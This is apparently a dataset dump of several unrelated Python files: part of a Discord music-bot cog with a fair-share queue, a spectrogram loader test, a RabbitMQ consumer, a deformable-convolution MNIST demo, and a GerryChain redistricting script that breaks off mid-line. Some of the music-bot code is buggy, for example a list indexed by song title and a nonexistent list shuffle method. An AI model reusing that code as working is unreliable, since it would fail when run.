import music_converters as conv\n\n\nasync def get_entry(song, loop):\n song = sources.YTDLSource(song, loop=loop)\n await song.load_data()\n\n return song\n\n\nclass Queue:\n def __init__(self, chunk_size: int=2, max_chunks: int=None,\n max_per_user: int=None, unique: str=None,\n silence_errors=False):\n self.size = chunk_size\n self.max = max_chunks\n self.user_max = max_per_user\n self.unique = unique\n self.silence_errors = silence_errors\n self.items = []\n self.current = []\n\n def _error(self, err):\n if not self.silence_errors:\n raise Exception(err)\n\n @property\n def queue(self):\n r = self.current[:]\n for group in self.items:\n r += group\n return r\n\n def __len__(self):\n return len(self.queue)\n\n def __repr__(self):\n return (\"Queue(entries={1}, chunk_size={0.size}, \"\n \"max_chunks={0.max}, per_user={0.user_max}, \"\n \"unique={0.unique}, silent={0.silence_errors})\").format(\n self, len(self.queue))\n\n def show(self, source: str=\"title\"):\n res = []\n for group in self.items:\n g = []\n for data in group:\n g.append({source: getattr(data, source),\n \"request_id\": data.request_id})\n res.append(g)\n return res\n\n def add(self, items: list):\n errors = []\n for data in items:\n try:\n self.append(data)\n except Exception as e:\n errors[data.title] = e.args[0]\n return errors\n\n def append(self, item: sources.YTDLSource):\n # print(\"Adding:\", item)\n # === LOGIC ===\n # Basically, the first thing is to find the index of the user's\n # last song (since when they add something new, it should always be\n # added after their other songs)\n # This is achieved by iterating backwards through the current queue,\n # stopping the first time something by that user is found\n # Next, we iterate forward from that starting point.\n # For each song, we put the user that added it into a set.\n # We continue to move forward this way until we hit a user that\n # is already in the set. We stop here and insert the item.\n\n # For users A, B, and C, imagine starting queue ABCABCABCBBBBB\n\n # User A tries to put something in the queue\n # v last A, start here\n # ABCABCABCBBBBB\n # B goes into the set\n # C goes into the set\n # B is already in the set, so the A gets added here\n # ABCABCABCABBBBB\n\n # data[\"requester\"] should have the `id` attribute,\n # this could be e.g. 
a discord.Member\n id = item.request_id\n\n if not self.items:\n self.items.append([item])\n return\n\n if len(self.items) == self.max:\n self._error(\"Max queue chunks reached.\")\n\n if sum((chunk[0].request_id == id and\n len(chunk) == self.size)\n for chunk in self.items) == self.user_max:\n self._error(\"User reached maximum amount of chunks\")\n\n # Check for dupes\n if self.unique is not None:\n for chunk in self.items:\n for item_u in chunk:\n if (getattr(item_u, self.unique) ==\n getattr(item, self.unique)):\n self._error(\n \"Item already queued, `unique` key duplicate.\")\n\n # Insert the data\n # print(\"Iterating backwards\")\n for index, value in enumerate(reversed(self.items)):\n # print(index)\n if index == len(self.items)-1 or value[0].request_id == id:\n # we found the last item by us or\n # we have no items in the queue\n\n if value[0].request_id == id and len(value) < self.size:\n # last item by us has a free space left\n value.append(item)\n return\n\n # index to start from\n # python is 0-indexed so subtract 1\n start = len(self.items) - index - 1\n found_ids = []\n\n # Easier than `enumerate` in this case\n # print(\"Iterating forward\")\n while True:\n # print(start)\n if start >= len(self.items):\n # print(\"Inserting at the end\")\n # No place left, put it at the end\n self.items.append([item])\n return\n\n id = self.items[start][0].request_id\n\n if id in found_ids:\n # print(\"Duplicate found, inserting\")\n # this id appears for the second time now\n # so insert here\n self.items.insert(start, [item])\n return\n\n # Add the id to the list\n found_ids.append(id)\n\n start += 1\n\n def pop(self):\n if not self.current:\n # Load the next chunk\n # we use `pop` to make sure it disappears from the original list\n # because otherwise people could queue up forever\n self.current = self.items.pop(0)\n return self.current.pop(0)\n\n def clear(self):\n self.items.clear()\n self.current.clear()\n\n def shuffle(self, requester):\n s = []\n for i, chunk in enumerate(self.items):\n if chunk[0].requester == requester:\n chunk.shuffle() # shuffle chunk items\n s.append(i)\n\n # shuffle chunks around\n s_c = s[:]\n s_c.shuffle()\n queue = self.items[:]\n for i in s:\n queue[i] = self.items[s_c[i]]\n\n self.items = queue\n\n\nclass Player:\n opts = {\n 'format': 'bestaudio/best',\n 'noplaylist': True,\n 'audioformat': 'flac',\n 'quiet': True,\n 'default_search': 'auto'\n }\n\n try:\n tts = MaryTTS(enabled=True)\n except:\n # Voice not installed\n pass\n\n def __init__(self, voice_client, channel, cog):\n self.vc = voice_client\n self.chan = channel\n self._queue = Queue(unique=\"url\")\n self.cog = cog\n self.source = None\n\n async def queue(self, song, requester=None):\n if \"youtube.com/playlist\" in song:\n songs = await conv.youtube_playlist(song, requester,\n self.vc.loop)\n errors = self._queue.add(songs)\n if errors:\n await self.chan.send(\"\\n\".join(\"{}: {}\".format(t, e)\n for t, e in errors.items()))\n return await self.chan.send(\"Added {} items to the queue!\"\n .format(len(songs)-len(errors)))\n\n if all(x in song for x in [\"soundcloud.com\", \"/sets/\"]):\n songs = await conv.soundcloud_playlist(song, requester,\n self.vc.loop)\n errors = self._queue.add(songs)\n if errors:\n await self.chan.send(\"\\n\".join(\"{}: {}\".format(t, e)\n for t, e in errors.items()))\n return await self.chan.send(\"Added {} items to the queue!\"\n .format(len(songs)-len(errors)))\n\n if \"bandcamp.com/album\" in song:\n songs = await conv.bandcamp_playlist(song, requester,\n 
self.vc.loop)\n errors = self._queue.add(songs)\n if errors:\n await self.chan.send(\"\\n\".join(\"{}: {}\".format(t, e)\n for t, e in errors.items()))\n return await self.chan.send(\"Added {} items to the queue!\"\n .format(len(songs)-len(errors)))\n\n if \"osu.ppy.sh\" in song:\n song = await conv.osu_song(song, requester, self.vc.loop)\n self._queue.append(song)\n await self.chan.send(\n 'Added {} to the queue!'.format(song['title']))\n\n entry = await get_entry(song, self.vc.loop)\n entry.set_requester(requester)\n if entry.duration is None:\n return await self.chan.send(\"Song has no duration, not queueing!\")\n self._queue.append(entry)\n await self.chan.send('Added {} to the queue!'.format(entry.title))\n\n async def download_next(self):\n next = self._queue.pop()\n\n await self.chan.send('Now Playing: {}'.format(next.title))\n print('Now Playing: {}'.format(next.title))\n await next.load()\n\n self._start_time = time.time()\n\n self.current_song = next\n\n if self.source is not None:\n self.source = sources.OverlaySource(self.source, next,\n self, vc=self.vc)\n self.vc.source = self.source\n\n try:\n source = \"song_cache/{}.wav\".format(self.chan.id)\n can_pronounce = (\n \"abcdefghijklmnopqrstuvwxyz\"\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n \"0123456789 \"\n )\n replaces = {\n \"&\": \"and\",\n \" - \": \". \",\n \"ft.\": \"featuring\",\n \"official audio\": \"\",\n \"official video\": \"\",\n \"official music video\": \"\",\n \"free download\": \"\",\n \"lyric video\": \"\",\n \"audio\": \"\"\n }\n\n t = romkan.to_roma(next.title).lower()\n for c, r in replaces.items():\n t = t.replace(c, r)\n t = \"\".join(c for c in t if c in can_pronounce)\n data = await self.tts._say('Now Playing: {}'.format(t),\n voice=\"dfki-prudence\")\n with open(source, \"wb\") as f:\n f.write(data)\n self.source = sources.TTSOverlay(self.source, source,\n self, vc=self.vc)\n self.vc.source = self.source\n except Exception as e:\n print(e)\n else:\n self.source = next\n self.vc.play(next, after=lambda: self.skip(e=\"errorskip\"))\n\n def start(self):\n self._stop = False\n self._skip = False\n self._task = self.vc.loop.create_task(self.process_queue())\n\n async def stop(self):\n self._stop = True\n await self.vc.disconnect()\n self._task.cancel()\n self.vc.stop()\n self._queue.clear()\n del self.cog.players[self.chan.guild.id]\n\n def skip(self, e=None):\n if e is not None:\n print(e)\n\n if e == \"errorskip\":\n self.source = None\n self._skip = True\n\n async def process_queue(self):\n try:\n await self.download_next()\n queue_next = True\n\n while True:\n if self._stop:\n break\n\n await asyncio.sleep(1)\n try:\n if self.current_song.is_stream:\n # Streams have no duration\n continue\n except AttributeError as e:\n # print(e, \"No current song!\")\n # current_song not yet loaded\n continue\n\n now = time.time()\n time_left = self.current_song.duration - (now-self._start_time)\n self.percentage = 1 - (time_left / self.current_song.duration)\n if time_left <= 20 or self._skip:\n if queue_next is False and not self._skip:\n # print(\"ignoring\")\n continue\n\n if self._skip:\n self._skip = False\n\n queue_next = False\n # Less than 20 seconds left until\n # the song ends, start the next song.\n if len(self._queue) > 0:\n # There are still songs queued\n\n if isinstance(self.source, sources.OverlaySource):\n self.source = self.source._overlay_source\n self.vc.source = self.source\n\n # print(\"Downloading next song\")\n await self.download_next()\n now = time.time()\n time_left = (self.current_song.duration 
-\n (now-self._start_time))\n for _ in range(round(time_left)*2):\n try:\n self.source.vol_change_step()\n self.source.vol_change_step()\n await asyncio.sleep(0.5)\n except:\n break\n\n else:\n await asyncio.sleep(time_left)\n await self.chan.send(\"Queue empty, stopping...\")\n data = await self.tts._say('Queue empty, stopping...',\n voice=\"dfki-prudence\")\n source = \"song_cache/{}.wav\".format(self.chan.id)\n with open(source, \"wb\") as f:\n f.write(data)\n self.source = sources.TTSOverlay(self.source, source,\n self, vc=self.vc)\n self.vc.source = self.source\n await self.stop()\n\n else:\n queue_next = True\n except:\n traceback.print_exc()\n\n\nclass music:\n def __init__(self, amethyst):\n self.amethyst = amethyst\n self.players = {}\n\n @commands.command(name='play')\n async def music_play(self, ctx, *, song: str):\n start = False\n if ctx.guild.id not in self.players:\n vc = await ctx.author.voice.channel.connect(reconnect=True)\n self.players[ctx.guild.id] = Player(vc, ctx.channel, self)\n start = True\n\n await self.players[ctx.guild.id].queue(song, requester=ctx.author)\n\n if start:\n self.players[ctx.guild.id].start()\n\n @commands.command(name='queue')\n async def music_playlist(self, ctx):\n player = self.players[ctx.guild.id]\n queue = []\n for song in player._queue.queue:\n s = song.title\n if song.requester == ctx.author:\n s = \"**{}**\".format(s)\n queue.append(s)\n\n t = (\"**Now playing:** __{}__\"\n \"\\n**Queue:** \\n{}\").format(\n player.current_song.title,\n \"\\n\".join(queue))\n await ctx.send(t)\n\n @commands.command(name=\"disconnect\")\n async def music_disconnect(self, ctx):\n await self.players[ctx.guild.id].stop()\n\n @commands.command(name=\"song\")\n async def music_current_song(self, ctx):\n song = self.players[ctx.guild.id].current_song\n title = song.title\n url = song.url\n req = str(song.requester)\n upl = song.uploader\n perc = self.players[ctx.guild.id].percentage\n prog = \"#\"*round(perc*10)+\"-\"*round((1-perc)*10)\n\n e = discord.Embed(title=\"Now Playing\",\n description=title)\n\n e.add_field(name=\"Source\", value=\"[Click here!]({})\".format(url))\n e.add_field(name=\"Progress\", value=\"`[{}]` - {}%\".format(\n prog, round(perc*100)))\n e.add_field(name=\"Uploaded by\", value=upl, inline=True)\n e.add_field(name=\"Requested by\", value=req, inline=True)\n\n if song.thumbnail:\n e.set_thumbnail(url=song.thumbnail)\n\n await ctx.send(embed=e)\n\n @commands.command(name=\"skip\")\n async def music_skip(self, ctx):\n if ctx.author == self.players[ctx.guild.id].current_song.requester:\n self.players[ctx.guild.id].skip()\n else:\n await ctx.send(\"Skipping has only been implemented for the\"\n \" person who queued the song.\")\n\n\ndef setup(amethyst):\n amethyst.add_cog(music(amethyst))\n","sub_path":"modules/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":16767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"82640053","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 18 09:56:28 2017\n\n@author: hsadeghi\n\"\"\"\n\nfrom spectrogram_loader import data_loader, data_parser\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#%%\nnum_files = 1\nbatch_size = 1\n\nprint(\"Loading data started\") \ninput_dim = 2**13\ndata = {}\nfor i in range(num_files):\n data[i] = data_loader(i, input_dim)\n\nprint(\"Loading data finished\") \n\n#%%\ndef inf_train_gen(data=data):\n while True:\n rand_ind = np.random.randint(0, num_files)\n yield 
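Queue.append in music.py above interleaves requesters round-robin so no single user monopolizes playback. A toy reduction of that fairness rule, ignoring chunk sizes and per-user caps:

from collections import defaultdict, deque

def fair_order(requests):
    # requests: list of (user, song) in arrival order
    per_user = defaultdict(deque)
    for user, song in requests:
        per_user[user].append(song)
    order, users = [], deque(per_user)
    while users:
        user = users.popleft()
        order.append(per_user[user].popleft())
        if per_user[user]:
            users.append(user)  # user re-enters the rotation
    return order

print(fair_order([('A', 'a1'), ('A', 'a2'), ('B', 'b1'), ('C', 'c1')]))
# -> ['a1', 'b1', 'c1', 'a2']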
data_parser(data[rand_ind], input_dim, batch_size)\n \nloader = inf_train_gen()\n\n#%%\n\nfor i in range(5):\n \n Sxx = next(loader)\n\n print('Sxx.shape after split', Sxx.shape)\n \n plt.figure()\n img = np.squeeze(Sxx[0,:,:,0])\n# img = img + abs(np.min(img))\n# img = img/np.max(img)\n plt.imshow(img)\n print('min(img)', np.min(img))\n print('max(img)', np.max(img))\n \n# plt.figure()\n# plt.pcolormesh(Sxx[0])\n# plt.ylabel('Frequency [Hz]')\n# plt.xlabel('Time [sec]')\n# plt.show()\n# # plt.pause(1)\n# \n# Sxx = next(loader)\n# \n# print('Sxx.shape after split', [len(Sxx), Sxx[0].shape])\n# print(\"max(Sxx)\", np.max(Sxx[0]))\n# \n# plt.figure()\n# plt.pcolormesh(Sxx[0])\n# plt.ylabel('Frequency [Hz]')\n# plt.xlabel('Time [sec]')\n# plt.show()\n\n\n","sub_path":"december/tf-dcgan/test_loading_images.py","file_name":"test_loading_images.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"571787500","text":"import pika\nimport json\n'''\n消费者\n'''\n# 获取连接\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n# 拿到 channel\nchannel = connection.channel()\n# 声明需要的 queue\n'''\n持久化\n`durable=True`\n配置一次获取多少消息\n`prefetch_count=2` ['pri:'fetʃ]\n'''\nchannel.queue_declare(queue='a', durable=True)\n\n# 定义一次取几条消息\nchannel.basic_qos(prefetch_count=2)\n\n\n# 定义获取消息的回调处理函数\ndef callback(ch, method, properties, body):\n import time\n time.sleep(10)\n body = json.loads(body.decode())\n print(body.get('123'))\n ch.basic_ack(delivery_tag = method.delivery_tag)\n\n\nchannel.basic_consume(callback, queue='a', no_ack=False)\n# channel.basic_consume(callback, queue='b', no_ack=True)\n# 接收消息\nchannel.start_consuming()","sub_path":"ProgrammingLanguage/Python/book/rabbitmq/consuming.py","file_name":"consuming.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"158882297","text":"from __future__ import print_function\n\nimport argparse\nimport random\nfrom time import time\n\nimport numpy as np\nimport torch\nimport torch.cuda\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\n\nfrom deform_conv import DeformConv2D\n\n\nclass DeformNet(nn.Module):\n def __init__(self):\n super(DeformNet, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=3, padding=1)\n self.bn1 = nn.BatchNorm2d(32)\n\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1)\n self.bn2 = nn.BatchNorm2d(64)\n\n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n\n # deformable convolution\n self.offsets = nn.Conv2d(128, 18, kernel_size=3, padding=1)\n self.conv4 = DeformConv2D(128, 128, kernel_size=3, padding=1)\n self.bn4 = nn.BatchNorm2d(128)\n\n self.classifier = nn.Linear(128, 10)\n\n def forward(self, x):\n # convs\n x = F.relu(self.conv1(x))\n x = self.bn1(x)\n x = F.relu(self.conv2(x))\n x = self.bn2(x)\n x = F.relu(self.conv3(x))\n x = self.bn3(x)\n\n # deformable convolution\n offsets = self.offsets(x)\n x = F.relu(self.conv4(x, offsets))\n x = self.bn4(x)\n\n x = F.avg_pool2d(x, kernel_size=28, stride=1).view(x.size(0), -1)\n x = self.classifier(x)\n\n return F.log_softmax(x, dim=1)\n\n\nclass PlainNet(nn.Module):\n def __init__(self):\n super(PlainNet, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=3, padding=1)\n self.bn1 = 
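The consuming.py worker above assumes someone publishes to the durable queue 'a'. A hedged producer counterpart (the payload is invented; delivery_mode=2 marks the message persistent so it survives a broker restart):

import json
import pika

connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='a', durable=True)  # must match the consumer
channel.basic_publish(
    exchange='',
    routing_key='a',
    body=json.dumps({'123': 'hello'}),
    properties=pika.BasicProperties(delivery_mode=2),
)
connection.close()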
nn.BatchNorm2d(32)\n\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1)\n self.bn2 = nn.BatchNorm2d(64)\n\n self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n\n self.conv4 = nn.Conv2d(128, 128, kernel_size=3, padding=1)\n self.bn4 = nn.BatchNorm2d(128)\n\n self.classifier = nn.Linear(128, 10)\n\n def forward(self, x):\n # convs\n x = F.relu(self.conv1(x))\n x = self.bn1(x)\n x = F.relu(self.conv2(x))\n x = self.bn2(x)\n x = F.relu(self.conv3(x))\n x = self.bn3(x)\n x = F.relu(self.conv4(x))\n x = self.bn4(x)\n\n x = F.avg_pool2d(x, kernel_size=28, stride=1).view(x.size(0), -1)\n x = self.classifier(x)\n\n return F.log_softmax(x, dim=1)\n\n\ndef init_weights(m):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight, gain=nn.init.calculate_gain('relu'))\n if m.bias is not None:\n m.bias.data = torch.zeros(m.bias.shape[0])\n\n\ndef init_conv_offset(m):\n m.weight.data = torch.zeros_like(m.weight.data)\n if m.bias is not None:\n m.bias.data = torch.zeros(m.bias.shape[0])\n\n\ndef main(args, device):\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./MNIST', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, num_workers=0, pin_memory=True\n )\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('./MNIST', train=False, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.test_batch_size, shuffle=True, num_workers=0, pin_memory=True\n )\n\n model = DeformNet()\n # model = PlainNet()\n\n model.apply(init_weights)\n try:\n model.offsets.apply(init_conv_offset)\n except AttributeError:\n pass\n\n model = model.to(device)\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n def train(epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n def test():\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in tqdm(test_loader):\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.max(dim=1)[1] # get the index of the max log-probability\n correct += pred.eq(target).sum().item()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. 
* correct / len(test_loader.dataset)))\n\n for epoch in range(1, args.epochs + 1):\n since = time()\n train(epoch)\n iter = time() - since\n print(\"Spends {}s for each training epoch\".format(iter / args.epochs))\n test()\n\n\nif __name__ == '__main__':\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=32, metavar='N',\n help='input batch size for training (default: 32)')\n parser.add_argument('--test-batch-size', type=int, default=32, metavar='N',\n help='input batch size for testing (default: 32)')\n parser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n args = parser.parse_args()\n\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if torch.cuda.is_available() and args.cuda:\n torch.cuda.manual_seed(args.seed)\n torch.backends.cudnn.enabled = True # Enables cudnn\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True # To have ~deterministic results\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n main(args, device)\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"636555712","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 16:47:51 2020\n\n@author: dinos\n\nthis version normalizes initial partition to 50% dem /republican\nThis does NOT perform a Markov chain simulation but instead recreates EACH instance of a simulated district partition from scratch\nusing recursive_tree_part to create random districts. 
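The MNIST demo.py above routes all weight initialization through Module.apply, which walks every submodule so a single function can cover all layer types. A self-contained illustration of that traversal (the toy network is invented):

import torch.nn as nn

def init_weights(m):
    if isinstance(m, (nn.Conv2d, nn.Linear)):
        nn.init.xavier_uniform_(m.weight, gain=nn.init.calculate_gain('relu'))
        if m.bias is not None:
            m.bias.data.zero_()

net = nn.Sequential(nn.Conv2d(1, 8, 3), nn.ReLU(), nn.Flatten(),
                    nn.Linear(8 * 26 * 26, 10))
net.apply(init_weights)  # visits every submodule, leaves to root
print(sum(p.numel() for p in net.parameters()), 'parameters initialized')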
While this is slow, \nSome nice stuff added to DataFrame structure to add congressional district labels in order of actual increasing congressional district No.\n\ndependencies include stopit - install with pip (conda install didn't work for me)\nIt prevents recursive_tree_part from getting hung-up indefinitely, uses time_out to define maximum limit before timing out\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nCreated on Tue Mar 24 16:55:12 2020\nuses recom proposal\n@author: dpg\n\"\"\"\n\n\nimport backup_chain as bc\nfrom multiprocessing import set_start_method, freeze_support\n#from multiprocessing import Pool\nfrom multiprocessing import get_context\nimport backup_chain as bc\nimport matplotlib.pyplot as plt\nimport time\nimport stopit\nfrom gerrychain import (GeographicPartition, Partition, Graph, MarkovChain,\n proposals, updaters, constraints, accept, Election)\nfrom gerrychain.proposals import recom\nfrom gerrychain.tree import recursive_tree_part\nfrom functools import partial\nfrom strcmp_matlab import strfilter\nimport pandas\nimport numpy as np\nfrom gerrychain.metrics import mean_median, efficiency_gap, polsby_popper\nfrom get_districtlabels import get_labels\nfrom norm_50 import norm_data\nfrom get_electioninfo import get_elections\nimport random\nimport os \n \ndef multichain_run(i1, graph, chainlength, my_apportionment, poptol, my_electionproxy, my_electionproxy_alternate, rsw, rmm, reg, rpp, datastruct, state):\n\n # poptol = 0.06 #min % population deviation per district\n totsteps = 2\n elections, composite = get_elections(state)\n time_out=400\n if \"TOTPOP\" in graph._node[0]:\n popkey = \"TOTPOP\"\n elif \"PERSONS\" in graph._node[0]:\n popkey = \"PERSONS\"\n else:\n popkey = []\n print(\"woops no popkey in file, look @ graph._node[0] to figure out what the keyword for population is\\n\")\n#CONFIGURE UPDATERS\n#We want to set up updaters for everything we want to compute for each plan in the ensemble.\n\n\n# Population updater, for computing how close to equality the district\n# populations are. 
\"TOTPOP\" is the population column from our shapefile.\n my_updaters = {\"population\": updaters.Tally(popkey, alias=\"population\")}\n\n\n# Election updaters, for computing election results using the vote totals\n# from our shapefile.\n election_updaters = {election.name: election for election in elections}\n my_updaters.update(election_updaters)\n\n\n#INITIAL PARTITION\n initial_partition, graph, my_updaters = norm_data(graph, my_updaters, my_apportionment, my_electionproxy, my_electionproxy_alternate, state)\n \n #this block obtains the Congressional District Labels and converts to string labels, cds\n \n cds = get_labels(initial_partition, my_electionproxy) #get congressional district labels\n nparts = len(initial_partition)\n ideal_population = sum(list(initial_partition[\"population\"].values())) / len(initial_partition)\n random.seed(os.urandom(10)*i1) \n \n pop_constraint = constraints.within_percent_of_ideal_population(initial_partition, poptol)\n proposal = partial(recom,\n pop_col=popkey,\n pop_target=ideal_population,\n epsilon=poptol,\n node_repeats=2\n )\n itno = 0\n for zz in range(chainlength):\n with stopit.ThreadingTimeout(time_out) as to_ctx_mgr:\n assert to_ctx_mgr.state == to_ctx_mgr.EXECUTING\n ranpart = recursive_tree_part(graph, range(nparts), ideal_population, popkey,poptol-0.02,node_repeats=1)\n randpartition = GeographicPartition(graph,assignment = ranpart, updaters = my_updaters)\n \n if to_ctx_mgr.state == to_ctx_mgr.EXECUTED:\n compactness_bound = constraints.UpperBound(\n lambda p: len(p[\"cut_edges\"]),\n 2*len(initial_partition[\"cut_edges\"])\n )\n chain = MarkovChain(\n proposal=proposal,\n constraints=[\n pop_constraint,\n compactness_bound],\n accept=accept.always_accept,\n initial_state=randpartition,\n total_steps = totsteps\n )\n \n \n print(i1, \" got here\\n\")\n for part in chain:\n rsw.append(part[my_electionproxy].wins(\"Democratic\"))\n rmm.append(mean_median(part[my_electionproxy]))\n reg.append(efficiency_gap(part[my_electionproxy]))\n # rpp.append(np.mean(pd.Series(polsby_popper(part)))) #depends on geometry of the partition only not on vote outcomes\n datax = pandas.DataFrame(sorted(part[my_electionproxy].percents(\"Democratic\" )), index=cds)\n datax = datax.transpose()\n # data1 = pandas.concat([data1, pandas.DataFrame(part[\"SEN12\"].percents(\"Democratic\" ))],axis=1)\n datastruct = pandas.concat([datastruct, datax])\n if itno % 1 == 0:\n print(\"worker \", i1, \" iteration = \", itno, \"chain = \", zz ,\"\\n\")\n itno+=1\n \n elif to_ctx_mgr.state == to_ctx_mgr.TIMED_OUT:\n print(\"time out, worker \", i1, \"\\n\")\n for kk in range(totsteps):\n rsw.append(-1 )\n rmm.append(-100*mean_median(initial_partition[my_electionproxy]))\n reg.append(-100*efficiency_gap(initial_partition[my_electionproxy]))\n rpp.append(-1 )\n datax = pandas.DataFrame(sorted(initial_partition[my_electionproxy].percents(\"Democratic\" )), index=cds)\n datax = datax.transpose()\n # data1 = pandas.concat([data1, pandas.DataFrame(part[\"SEN12\"].percents(\"Democratic\" ))],axis=1)\n datastruct = pandas.concat([datastruct, datax])\n # Eeek the 100 seconds timeout occurred while executing the block\n return i1, rsw, rmm, reg, rpp, datastruct \n \n#MAIN PROGRAM HERE:\n #few key lines for making parallel pool not mess up (freeze_support() and __spec__ definition)\nif __name__ == '__main__':\n freeze_support()\n __spec__ = \"ModuleSpec(name='builtins', loader=)\"\n dontfeedin = 0 #if set=0, feeds in data, otherwise skip\n poolsize=40\n chainlength=50\n totsteps = 2\n 
normalize='normalized'\n countysp=''\n postfix='2'\n#DEFINE CONSTANTS:\n dontfeedin = 0 #if set=0, feeds in data, otherwise skip\n \n # exec(open(\"input_templates/MI_SENDIST_PRES16.py\").read()) #MI SENATE\n #exec(open(\"input_templates/PA_SEND_SEN12.py\").read()) #PA HOUSE\n exec(open(\"input_templates/TX_HD_SEN12.py\").read()) #TX HOUSE\n # my_electionproxy_alternate = my_electionproxy\n #for PA data:\n \n \n elections, composite = get_elections(state)\n \n \n if 'dontfeedin' in globals():\n if dontfeedin == 0 or not( 'graph' in globals()):\n if \".json\" in my_electiondatafile:\n graph = Graph.from_json(my_electiondatafile)\n else:\n graph = Graph.from_file(my_electiondatafile)\n else:\n if \".json\" in my_electiondatafile:\n graph = Graph.from_json(my_electiondatafile)\n else:\n graph = Graph.from_file(my_electiondatafile)\n \n if 'poptol' not in globals():\n poptol = 0.03\n if \"TOTPOP\" in graph._node[0]:\n popkey = \"TOTPOP\"\n elif \"PERSONS\" in graph._node[0]:\n popkey = \"PERSONS\"\n else:\n popkey = []\n print(\"woops no popkey in file, look @ graph._node[0] to figure out what the keyword for population is\\n\")\n #CONFIGURE UPDATERS\n #We want to set up updaters for everything we want to compute for each plan in the ensemble.\n \n \n # Population updater, for computing how close to equality the district\n # populations are. \"TOTPOP\" is the population column from our shapefile.\n my_updaters = {\"population\": updaters.Tally(popkey, alias=\"population\")}\n \n election_updaters = {election.name: election for election in elections}\n my_updaters.update(election_updaters)\n \n #run chain ONCE to clean up graph and use primary election assignment name...\n #INITIAL PARTITION\n initial_partition = GeographicPartition(graph, assignment=my_apportionment, updaters=my_updaters)\n # initial_partition, graph, my_updaters = norm_data(graph, my_updaters, my_apportionment, my_electionproxy, my_electionproxy_alternate)\n # cds = get_labels(initial_partition, my_electionproxy) #get congressional district labels\n #RUNNING THE CHAIN\n ideal_population = sum(list(initial_partition[\"population\"].values())) / len(initial_partition)\n \n # We use functools.partial to bind the extra parameters (pop_col, pop_target, epsilon, node_repeats)\n # of the recom proposal.\n \n \n t0=time.time()\n #now can do initial_partition and know my_electionproxy will be OK, won't need alternate\n initial_partition, graph, my_updaters = norm_data(graph, my_updaters, my_apportionment, my_electionproxy, my_electionproxy_alternate, state)\n cds = get_labels(initial_partition, my_electionproxy) #get congressional district labels\n # This will take about 10 minutes.\n #setup variables\n rsw = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n rmm = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n reg = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, chainlength])\n rpp = [[0 for x in range(1)] for x in range(poolsize)] # np.zeros([poolsize, 